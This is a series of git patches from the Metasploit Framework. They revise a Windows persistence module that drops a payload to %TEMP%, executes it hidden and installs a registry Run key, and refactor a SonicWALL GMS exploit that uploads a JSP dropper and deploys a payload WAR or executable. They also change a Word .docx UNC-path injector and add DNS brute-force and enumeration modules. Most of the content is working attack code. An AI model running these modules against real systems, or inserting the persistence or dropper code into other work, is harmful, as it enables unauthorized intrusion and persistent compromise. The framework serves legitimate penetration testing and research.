<carlos_perez[at]darkoperator.com>' + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => [ [ 'Windows', {} ] ], + 'DefaultTarget' => 0, + 'DisclosureDate'=> "Oct 19 2011" + )) + + register_options( + [ + OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]), + OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]), + OptString.new('REXENAME',[false, 'The name to call payload on remote system.','']), + OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']), + ], self.class) + + end + + # Run Method for when run command is issued + #------------------------------------------------------------------------------- + def exploit + print_status("Running module against #{sysinfo['Computer']}") + + rexe = datastore['EXE::Custom'] + rexename = datastore['REXENAME'] + delay = datastore['DELAY'] + reg_val = datastore['REG_NAME'] + template_pe = datastore['EXE::Template'] + @clean_up_rc = "" + host,port = session.session_host, session.session_port + + if rexe.nil? + script = create_script(delay, template_pe) + script_on_target = write_script_to_target(script,rexename) + else + alt_pay_exe = get_custom_exe + script_on_target = write_exe_to_target(alt_pay_exe, rexename) + end + + # Initial execution of script + target_exec(script_on_target) + + case datastore['STARTUP'] + when /USER/i + write_to_reg("HKCU", script_on_target, reg_val) + when /SYSTEM/i + write_to_reg("HKLM", script_on_target, reg_val) + end + + clean_rc = log_file() + file_local_write(clean_rc,@clean_up_rc) + print_status("Cleanup Meterpreter RC File: #{clean_rc}") + + report_note(:host => host, + :type => "host.persistance.cleanup", + :data => { + :local_id => session.sid, + :stype => session.type, + :desc => session.info, + :platform => session.platform, + :via_payload => session.via_payload, + :via_exploit => session.via_exploit, + :created_at => Time.now.utc, + :commands => @clean_up_rc + } + ) + end + + # Function for Creating persistent script + #------------------------------------------------------------------------------- + def create_script(delay, altexe) + if not altexe.nil? + vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay, :template => altexe}) + else + vbs = ::Msf::Util::EXE.to_win32pe_vbs(session.framework, payload.raw, {:persist => true, :delay => delay}) + end + print_status("Persistent agent script is #{vbs.length} bytes long") + return vbs + end + + # Function for creating log folder and returning log path + #------------------------------------------------------------------------------- + def log_file(log_path = nil) + #Get hostname + host = session.sys.config.sysinfo["Computer"] + + # Create Filename info to be appended to downloaded files + filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") + + # Create a directory for the logs + if log_path + logs = ::File.join(log_path, 'logs', 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) ) + else + logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) ) + end + + # Create the log directory + ::FileUtils.mkdir_p(logs) + + #logfile name + logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc" + return logfile + end + + # Function for writing script to target host + #------------------------------------------------------------------------------- + def write_script_to_target(vbs,name) + tempdir = session.fs.file.expand_path("%TEMP%") + if name.nil? + tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" + else + tempvbs = tempdir + "\\" + name + ".vbs" + end + fd = session.fs.file.new(tempvbs, "wb") + fd.write(vbs) + fd.close + print_good("Persistent Script written to #{tempvbs}") + @clean_up_rc << "rm #{tempvbs}\n" + return tempvbs + end + + # Function to execute script on target and return the PID of the process + #------------------------------------------------------------------------------- + def target_exec(script_on_target) + print_status("Executing script #{script_on_target}") + if datastore['EXE::Custom'].nil? + proc = session.sys.process.execute(script_on_target, nil, {'Hidden' => true}) + else + proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true}) + end + + print_good("Agent executed with PID #{proc.pid}") + @clean_up_rc << "kill #{proc.pid}\n" + return proc.pid + end + + # Function to install payload in to the registry HKLM or HKCU + #------------------------------------------------------------------------------- + def write_to_reg(key,script_on_target, registry_value) + if registry_value.nil? + nam = Rex::Text.rand_text_alpha(rand(8)+8) + else + nam = registry_value + end + + print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") + + if(key) + registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ") + print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") + else + print_error("Error: failed to open the registry key for writing") + end + end + + # Function for writing executable to target host + #------------------------------------------------------------------------------- + def write_exe_to_target(exe_raw, rexename) + if rexename.nil? + exe_name = Rex::Text.rand_text_alpha(rand(8)+8) + else + exe_name = rexename + end + + tempdir = session.fs.file.expand_path("%TEMP%") + tempexe = tempdir + "\\" + exe_name + ".exe" + fd = session.fs.file.new(tempexe, "wb") + fd.write(exe_raw) + fd.close + print_good("Persistent Script written to #{tempexe}") + @clean_up_rc << "rm #{tempexe}\n" + return tempexe + end +end \ No newline at end of file From bf28be7cffaf6e33d6dd2f2f0acc73eac523ce24 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 7 Feb 2013 18:36:04 -0600 Subject: [PATCH 312/421] Fix some comments that yard parsed incorrectly --- lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb index 1a2d5cc47841..b66fc1707e5e 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb @@ -28,7 +28,7 @@ def webcam_list names end - # Starts recording video from video source of index #{cam} + # Starts recording video from video source of index +cam+ def webcam_start(cam) request = Packet.create_request('webcam_start') request.add_tlv(TLV_TYPE_WEBCAM_INTERFACE_ID, cam) @@ -48,7 +48,7 @@ def webcam_stop true end - # Record from default audio source for #{duration} seconds; + # Record from default audio source for +duration+ seconds; # returns a low-quality wav file def record_mic(duration) request = Packet.create_request('webcam_audio_record') From 16a0ab19337e92716e23c86f2a13c521370bf7ab Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 7 Feb 2013 18:37:11 -0600 Subject: [PATCH 313/421] Fix comment link and some whitespace --- lib/msf/core/post/file.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/post/file.rb b/lib/msf/core/post/file.rb index db841aa46da3..47a0677c1c71 100644 --- a/lib/msf/core/post/file.rb +++ b/lib/msf/core/post/file.rb @@ -274,7 +274,7 @@ def append_file(file_name, data) end # - # Read a local file +local+ and write it as +remote+ on the remote file + # Read a local file +local+ and write it as +remote+ on the remote file # system # def upload_file(remote, local) @@ -304,7 +304,7 @@ def rm_f(*remote_files) # def rename_file(new_file, old_file) #TODO: this is not ideal as the file contents are sent to meterp server and back to the client - write_file(new_file, read_file(old_file)) + write_file(new_file, read_file(old_file)) rm_f(old_file) end alias :move_file :rename_file @@ -315,7 +315,7 @@ def rename_file(new_file, old_file) # Meterpreter-specific file read. Returns contents of remote file # +file_name+ as a String or nil if there was an error # - # You should never call this method directly. Instead, call #read_file + # You should never call this method directly. Instead, call {#read_file} # which will call this if it is appropriate for the given session. # def _read_file_meterpreter(file_name) From c131b7ef0e8953ca67e91f0460e0b3885a0b1b52 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Thu, 7 Feb 2013 21:06:05 -0400 Subject: [PATCH 314/421] Added exception handing and return checking as requested by Sinn3r --- modules/exploits/windows/local/persistence.rb | 92 ++++++++++++++----- 1 file changed, 67 insertions(+), 25 deletions(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 336c8678b6f9..942cd8f9df89 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -50,7 +50,7 @@ def initialize(info={}) [ OptInt.new('DELAY', [true, 'Delay in seconds for persistent payload to reconnect.', 5]), OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]), - OptString.new('REXENAME',[false, 'The name to call payload on remote system.','']), + OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]), OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']), ], self.class) @@ -72,19 +72,38 @@ def exploit if rexe.nil? script = create_script(delay, template_pe) script_on_target = write_script_to_target(script,rexename) + if script_on_target == nil + # exit the module because we failed to write the file on the target host. + return + end else alt_pay_exe = get_custom_exe script_on_target = write_exe_to_target(alt_pay_exe, rexename) + if script_on_target == nil + # exit the module because we failed to write the file on the target host. + return + end end # Initial execution of script - target_exec(script_on_target) + if target_exec(script_on_target) == nil + # Exit if we where not able to run the payload. + return + end case datastore['STARTUP'] when /USER/i - write_to_reg("HKCU", script_on_target, reg_val) + regwrite = write_to_reg("HKCU", script_on_target, reg_val) + # if we could not write the entry in the registy we exit the module. + if not regwrite + return + end when /SYSTEM/i - write_to_reg("HKLM", script_on_target, reg_val) + regwrite = write_to_reg("HKLM", script_on_target, reg_val) + # if we could not write the entry in the registy we exit the module. + if not regwrite + return + end end clean_rc = log_file() @@ -146,37 +165,49 @@ def log_file(log_path = nil) #------------------------------------------------------------------------------- def write_script_to_target(vbs,name) tempdir = session.fs.file.expand_path("%TEMP%") - if name.nil? + if name tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" else tempvbs = tempdir + "\\" + name + ".vbs" end - fd = session.fs.file.new(tempvbs, "wb") - fd.write(vbs) - fd.close - print_good("Persistent Script written to #{tempvbs}") - @clean_up_rc << "rm #{tempvbs}\n" + begin + fd = session.fs.file.new(tempvbs, "wb") + fd.write(vbs) + fd.close + print_good("Persistent Script written to #{tempvbs}") + @clean_up_rc << "rm #{tempvbs}\n" + rescue + print_error("Could not write the payload on the target hosts.") + # return nil since we could not write the file on the target host. + tempvbs = nil + end return tempvbs end # Function to execute script on target and return the PID of the process #------------------------------------------------------------------------------- def target_exec(script_on_target) + execsuccess = true print_status("Executing script #{script_on_target}") - if datastore['EXE::Custom'].nil? - proc = session.sys.process.execute(script_on_target, nil, {'Hidden' => true}) - else - proc = session.sys.process.execute("cscript \"#{script_on_target}\"", nil, {'Hidden' => true}) + # error handling for process.execute() can throw a RequestError in send_request. + begin + if datastore['EXE::Custom'].nil? + session.shell_command_token(script_on_target) + else + session.shell_command_token("cscript \"#{script_on_target}\"") + end + rescue + print_error("Failed to execute payload on target host.") + execsuccess = nil end - - print_good("Agent executed with PID #{proc.pid}") - @clean_up_rc << "kill #{proc.pid}\n" - return proc.pid + return execsuccess end # Function to install payload in to the registry HKLM or HKCU #------------------------------------------------------------------------------- def write_to_reg(key,script_on_target, registry_value) + # Lets start to assume we had success. + write_success = true if registry_value.nil? nam = Rex::Text.rand_text_alpha(rand(8)+8) else @@ -186,10 +217,16 @@ def write_to_reg(key,script_on_target, registry_value) print_status("Installing into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") if(key) - registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ") - print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") + set_return = registry_setvaldata("#{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",nam,script_on_target,"REG_SZ") + if set_return + print_good("Installed into autorun as #{key}\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\#{nam}") + else + print_error("Failed to make entry in the registry for persistence.") + write_success = false + end else print_error("Error: failed to open the registry key for writing") + write_success = false end end @@ -204,11 +241,16 @@ def write_exe_to_target(exe_raw, rexename) tempdir = session.fs.file.expand_path("%TEMP%") tempexe = tempdir + "\\" + exe_name + ".exe" - fd = session.fs.file.new(tempexe, "wb") - fd.write(exe_raw) - fd.close - print_good("Persistent Script written to #{tempexe}") - @clean_up_rc << "rm #{tempexe}\n" + begin + fd = session.fs.file.new(tempexe, "wb") + fd.write(exe_raw) + fd.close + print_good("Persistent executable written to #{tempexe}") + @clean_up_rc << "rm #{tempexe}\n" + rescue + print_error("Failed to write the payload on the target.") + tempexe = nil + end return tempexe end end \ No newline at end of file From 0ad548a777471ead59e604f07af79d4e5d48dfe8 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 7 Feb 2013 19:16:44 -0600 Subject: [PATCH 315/421] I expect people to know what a share is. --- modules/exploits/windows/smb/smb_relay.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb index c66058140402..bbbcb2c34cbc 100644 --- a/modules/exploits/windows/smb/smb_relay.rb +++ b/modules/exploits/windows/smb/smb_relay.rb @@ -95,7 +95,7 @@ module is not able to clean up after itself. The service and payload register_options( [ OptAddress.new('SMBHOST', [ false, "The target SMB server (leave empty for originating system)"]), - OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]) + OptString.new('SHARE', [ true, "The share to connect to", 'ADMIN$' ]) ], self.class ) end From 1f9a09d5dde2aba2135e0d86958d2ddb048008be Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 7 Feb 2013 21:09:32 -0600 Subject: [PATCH 316/421] Add a method to upload and exec in one step --- .../multi/http/sonicwall_gms_upload.rb | 51 ++++++++++--------- 1 file changed, 27 insertions(+), 24 deletions(-) diff --git a/modules/exploits/multi/http/sonicwall_gms_upload.rb b/modules/exploits/multi/http/sonicwall_gms_upload.rb index 27f928b9bd4d..4a78d8149700 100644 --- a/modules/exploits/multi/http/sonicwall_gms_upload.rb +++ b/modules/exploits/multi/http/sonicwall_gms_upload.rb @@ -5,9 +5,6 @@ # http://metasploit.com/ ## -load 'lib/msf/core/payload/java.rb' -load 'lib/msf/core/encoded_payload.rb' -load 'lib/msf/util/exe.rb' require 'msf/core' class Metasploit3 < Msf::Exploit::Remote @@ -61,7 +58,7 @@ def initialize(info = {}) 'Platform' => 'win' } ], - [ 'SonicWALL GMS Viewpoint 6.0 Virtual Appliance (Linux)', + [ 'SonicWALL GMS 6.0 Viewpoint Virtual Appliance (Linux)', { 'Arch' => ARCH_X86, 'Platform' => 'linux' @@ -141,13 +138,25 @@ def upload_file(location, filename, contents) end end - def check - @peer = "#{rhost}:#{rport}" + def upload_and_run_jsp(filename, contents) + upload_file(path_join(install_path,"webapps","appliance"), filename, contents) + send_request_cgi( + { + 'uri' => normalize_uri(target_uri.path, "appliance", filename), + 'method' => 'GET' + }) + end + def check if install_path.nil? return Exploit::CheckCode::Safe end + if install_path.include?("\\") + print_status("Target looks like Windows") + else + print_status("Target looks like Linux") + end return Exploit::CheckCode::Vulnerable end @@ -171,26 +180,23 @@ def exploit end def exploit_java + print_status("#{@peer} - Uploading WAR file") jsp_name = "index" - #app_base = rand_text_alphanumeric(4+rand(32-4)) - app_base = "foo" + app_base = rand_text_alphanumeric(4+rand(32-4)) war = payload.encoded_war({ :app_name => app_base, :jsp_name => jsp_name, }).to_s - File.open("foo.war", "wb") { |fd| fd.write(war) } war_filename = path_join(install_path, "webapps","#{app_base}.war") + register_files_for_cleanup(war_filename) dropper = jsp_drop_bin(war, war_filename) dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" - upload_file(path_join(install_path,"webapps","appliance"), dropper_filename, dropper) - send_request_cgi( - { - 'uri' => normalize_uri(target_uri.path, "appliance", dropper_filename), - 'method' => 'GET' - }) + upload_and_run_jsp(dropper_filename, dropper) + + # Now make a request to trigger the newly deployed war send_request_cgi( { 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)), @@ -198,24 +204,20 @@ def exploit_java }) end - def exploit_native - dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" + print_status("#{@peer} - Uploading executable file") exe = payload.encoded_exe exe_filename = Rex::Text.rand_text_alpha(8) if target['Platform'] == "win" exe << ".exe" end - dropper = jsp_drop_and_execute(exe, "#{install_path}#{exe_filename}") + register_files_for_cleanup(exe_filename) - upload_file(path_join(install_path,"webapps","appliance"), dropper_filename, dropper) - send_request_cgi( - { - 'uri' => normalize_uri(target_uri.path, "appliance", dropper_filename), - 'method' => 'GET' - }) + dropper = jsp_drop_and_execute(exe, path_join(install_path, exe_filename)) + dropper_filename = Rex::Text.rand_text_alpha(8) + ".jsp" + upload_and_run_jsp(dropper_filename, dropper) end def path_join(*paths) @@ -230,6 +232,7 @@ def path_join(*paths) path end + # This should probably go in a mixin def jsp_drop_bin(bin_data, output_file) jspraw = %Q|<%@ page import="java.io.*" %>\n| jspraw << %Q|<%\n| From e535a3e93fd85052814c882b8bd7659365927b43 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Thu, 7 Feb 2013 21:10:27 -0600 Subject: [PATCH 317/421] Guard against running broken method on non-windows This just puts a bandaid around the issue and makes it so FileDropper doesn't completely break java and posix meterpreter sessions. [SeeRM #7721] --- lib/msf/core/exploit/file_dropper.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 2a17254de7d8..6298354b6795 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb @@ -22,7 +22,9 @@ def on_new_session(session) # Meterpreter should do this automatically as part of # fs.file.rm(). Until that has been implemented, remove the # read-only flag with a command. - session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|) + if session.platform =~ /win/ + session.shell_command_token(%Q|attrib.exe -r #{win_file}|) + end session.fs.file.rm(file) print_good("Deleted #{file}") true From 66f0bddb54e500669dfa5111b165e77e817d18b8 Mon Sep 17 00:00:00 2001 From: SphaZ <cyberphaz@gmail.com> Date: Fri, 8 Feb 2013 12:46:13 +0100 Subject: [PATCH 318/421] fixed error check, a comment, manipulate_file all in memory now --- modules/auxiliary/docx/word_unc_injector.rb | 86 +++++++-------------- 1 file changed, 26 insertions(+), 60 deletions(-) diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index c234f3dd8e02..3ee9bb93dab3 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -81,33 +81,29 @@ def make_new_file #here we inject an UNC path into an existing file, and store the injected file in FILENAME def manipulate_file - #where do we unpack our source files - tmp_dir = "#{Dir.tmpdir}/unc#{Time.now.to_i}#{rand(1000)}/" ref = "<w:attachedTemplate r:id=\"rId1\"/>" - - if not File.exists?(datastore['SOURCE']) - print_error("File #{datastore['SOURCE']} does not exist.") - return nil - end if not File.stat(datastore['SOURCE']).readable? print_error("Not enough rights to read the file. Aborting.") return nil end - #lets extract our docx - if unzip_docx(tmp_dir).nil? + #lets extract our docx and store it in memory + zip_data = unzip_docx + + #file to check for reference file we need + file_content = zip_data["word/settings.xml"] + if file_content.nil? + print_error("Bad \"word/settings.xml\" file, check if it is a valid .docx.") return nil end - file_content = File.read("#{tmp_dir}/word/settings.xml") - - #if we can find the reference, we don't need to add it and can just inject our unc file. + #if we can find the reference to our inject file, we don't need to add it and can just inject our unc path. if not file_content.index("w:attachedTemplate r:id=\"rId1\"").nil? vprint_status("Reference to rels file already exists in settings file, we dont need to add it :)") - update_docx_file(tmp_dir,"word/_rels/settings.xml.rels", @rels_file_data) + zip_data["word/_rels/settings.xml.rels"] = @rels_file_data # lets zip the end result - zip_docx(tmp_dir) + zip_docx(zip_data) else #now insert the reference to the file that will enable our malicious entry insert_one = file_content.index("<w:defaultTabStop") @@ -125,76 +121,46 @@ def manipulate_file if insert_one.nil? && insert_two.nil? print_error("Cannot find insert point for reference into settings.xml") - FileUtils.rm_rf(tmp_dir) return nil end #update the files that contain the injection and reference - update_docx_file(tmp_dir, "word/settings.xml",file_content) - update_docx_file(tmp_dir, "word/_rels/settings.xml.rels", @rels_file_data) - + zip_data["word/settings.xml"] = file_content + zip_data["word/_rels/settings.xml.rels"] = @rels_file_data #lets zip the file - zip_docx(tmp_dir) + zip_docx(zip_data) end - return 0 + return 0 end - #making the actual docx - def zip_docx(tmp_dir) + #making the actual docx from the hash + def zip_docx(zip_data) docx = Rex::Zip::Archive.new - #add skeleton files - vprint_status("Adding files from #{tmp_dir}") - Dir["#{tmp_dir}/**/**"].each do |file| - if not File.directory?(file) - docx.add_file(file.sub(tmp_dir,''), File.read(file)) - end + zip_data.each_pair do |k,v| + docx.add_file(k,v) end - #add the otherwise skipped "hidden" file - file = "#{tmp_dir}/_rels/.rels" - docx.add_file(file.sub(tmp_dir,''), File.read(file)) file_create(docx.pack) - FileUtils.rm_rf(tmp_dir) end #unzip the .docx document. sadly Rex::zip does not uncompress so we do it the Rubyzip way - def unzip_docx(tmp_dir) - #create temoprary directory so we can do some error handling if needed. - begin - if File.directory?(tmp_dir) - FileUtils.rm_rf(tmp_dir) - end - FileUtils.mkdir_p(tmp_dir) - rescue - print_error("Error creating/deleting temporary directory #{tmp_dir}, check rights.") - return nil - end - #unzip the SOURCE document into the tmp_dir - vprint_status("Rubyzip sometimes corrupts the document, so we do it the hard way. Extracting #{datastore['SOURCE']}") + def unzip_docx + #Ruby sometimes corrupts the document when manipulating inside a compressed document, so we extract it with Zip::ZipFile + vprint_status("Extracting #{datastore['SOURCE']} into memory.") + #we read it all into memory + zip_data = Hash.new begin Zip::ZipFile.open(datastore['SOURCE']) do |filezip| filezip.each do |entry| - fpath = File.join(tmp_dir, entry.name) - FileUtils.mkdir_p(File.dirname(fpath)) - filezip.extract(entry, fpath) + zip_data[entry.name] = filezip.read(entry) end end rescue Zip::ZipError => e print_error("Error extracting #{datastore['SOURCE']} please verify it is a valid .docx document.") return nil end - return 0 + return zip_data end - #used for updating the files inside the docx from a string - def update_docx_file(tmp_dir,file_string, content) - archive = File.join(tmp_dir, file_string) - vprint_status("We need to look for: #{archive}") - if File.exists?(archive) - vprint_status("Deleting original file #{archive}") - File.delete(archive) - end - File.open(archive, 'wb+') { |f| f.write(content) } - end def run #we need this in make_new_file and manipulate_file @@ -206,7 +172,7 @@ def run if "#{datastore['SOURCE']}" == "" #make an empty file - print_status("Creating empty document") + print_status("Creating empty document that points to #{datastore['LHOST']}.") make_new_file else #extract the word/settings.xml and edit in the reference we need From 2186db529573bbf05e2bb5ed61cd2fa9e4a385b0 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 09:48:32 -0400 Subject: [PATCH 319/421] Split of DNS Name Brutforce from enum_dns --- modules/auxiliary/gather/dns_bruteforce.rb | 137 +++++++++++++++++++++ 1 file changed, 137 insertions(+) create mode 100644 modules/auxiliary/gather/dns_bruteforce.rb diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb new file mode 100644 index 000000000000..a6e72080a6a9 --- /dev/null +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -0,0 +1,137 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require "net/dns/resolver" +require 'rex' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Host and Subdomain Brutefoce Module', + 'Description' => %q{ + This module uses a dictionary to perform a bruteforce on Hostnames and Subdomains + available under a given domain. + }, + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) + + register_options( + [ + OptString.new('DOMAIN', [ true, "The target domain name"]), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + OptPath.new('WORDLIST', [ false, "Wordlist file for domain name brute force.", + File.join(Msf::Config.install_root, "data", "wordlists", "namelist.txt")]), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('THREADS', [ false, "Number of threads", 1]), + ], self.class) + end + + def run + print_status("Enumerating #{datastore['DOMAIN']}") + @res = Net::DNS::Resolver.new() + @res.retry = datastore['RETRY'].to_i + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + wildcard(datastore['DOMAIN']) + switchdns() if not datastore['NS'].nil? + dnsbrt(datastore['DOMAIN']) + end + + #--------------------------------------------------------------------------------- + def wildcard(target) + rendsub = rand(10000).to_s + query = @res.query("#{rendsub}.#{target}", "A") + if query.answer.length != 0 + print_status("This Domain has Wildcards Enabled!!") + query.answer.each do |rr| + print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + end + return true + else + return false + end + end + + #--------------------------------------------------------------------------------- + def get_ip(host) + results = [] + query = @res.search(host, "A") + if (query) + query.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + end + query1 = @res.search(host, "AAAA") + if (query1) + query1.answer.each do |rr| + if rr.type == "CNAME" + results = results + get_ip(rr.cname) + else + record = {} + record[:host] = host + record[:type] = "AAAA" + record[:address] = rr.address.to_s + results << record + end + end + end + return results + end + + #--------------------------------------------------------------------------------- + def switchdns() + print_status("Using DNS Server: #{datastore['NS']}") + @res.nameserver=(datastore['NS']) + @nsinuse = datastore['NS'] + end + + def dnsbrt(domain) + print_status("Performing bruteforce against #{domain}") + queue = [] + File.open(datastore['WORDLIST'], 'rb').each_line do |testd| + queue << testd.strip + end + while(not queue.empty?) + tl = [] + 1.upto(datastore['THREADS']) do + tl << framework.threads.spawn("Module(#{self.refname})-#{domain}", false, queue.shift) do |testf| + Thread.current.kill if not testf + vprint_status("Testing #{testf}.#{domain}") + get_ip("#{testf}.#{domain}").each do |i| + print_good("#{i[:host]} #{i[:address]}") + report_host( + :host => i[:address].to_s, + :name => i[:host].gsub(/\.$/,'') + ) + end + end + end + if(tl.length == 0) + break + end + tl.first.join + tl.delete_if { |t| not t.alive? } + end + end +end From 906585798d0f3ceebab2877d11149581f8db5a78 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Fri, 8 Feb 2013 09:49:19 -0400 Subject: [PATCH 320/421] Split of DNS General Info from enum_dns --- modules/auxiliary/gather/dns_info.rb | 218 +++++++++++++++++++++++++++ 1 file changed, 218 insertions(+) create mode 100644 modules/auxiliary/gather/dns_info.rb diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb new file mode 100644 index 000000000000..bbf772cf5b32 --- /dev/null +++ b/modules/auxiliary/gather/dns_info.rb @@ -0,0 +1,218 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require "net/dns/resolver" +require 'rex' + +class Metasploit3 < Msf::Auxiliary + include Msf::Auxiliary::Report + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'DNS Base Information', + 'Description' => %q{ + This module enumerates basic DNS information for a given Domain. Information + enumerated is A, AAAA, NS and MX Records for the given domain. + }, + 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>' ], + 'License' => BSD_LICENSE + )) + + register_options( + [ + OptString.new('DOMAIN', [ true, "The target domain name"]), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + + ], self.class) + + register_advanced_options( + [ + OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), + OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), + ], self.class) + end + + def run + print_status("Enumerating #{datastore['DOMAIN']}") + @res = Net::DNS::Resolver.new() + @res.retry = datastore['RETRY'].to_i + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + wildcard(datastore['DOMAIN']) + switchdns() if not datastore['NS'].nil? + + # Get A and AAAA Records for the domain + get_ip(datastore['DOMAIN']).each do |r| + print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + report_host(:host => r[:address]) + end + + # Get Name Servers + get_ns(datastore['DOMAIN']).each do |r| + print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + report_host(:host => r[:address], :name => r[:host]) + report_service( + :host => r[:address], + :name => "dns", + :port => 53, + :proto => "udp" + ) + end + + # Get SOA + get_soa(datastore['DOMAIN']).each do |r| + print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + report_host(:host => r[:address], :name => r[:host]) + end + + #Get MX + get_mx(datastore['DOMAIN']).each do |r| + print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + report_host(:host => r[:address], :name => r[:host]) + report_service( + :host => r[:address], + :name => "smtp", + :port => 25, + :proto => "tcp" + ) + end + + # Get TX + get_txt(datastore['DOMAIN']).each do |r| + print_good("#{r[:host]} #{r[:address]} #{r[:type]}") + report_host(:host => r[:address], :name => r[:host]) + end + end + + #--------------------------------------------------------------------------------- + def wildcard(target) + rendsub = rand(10000).to_s + query = @res.query("#{rendsub}.#{target}", "A") + if query.answer.length != 0 + print_status("This Domain has Wildcards Enabled!!") + query.answer.each do |rr| + print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + end + return true + else + return 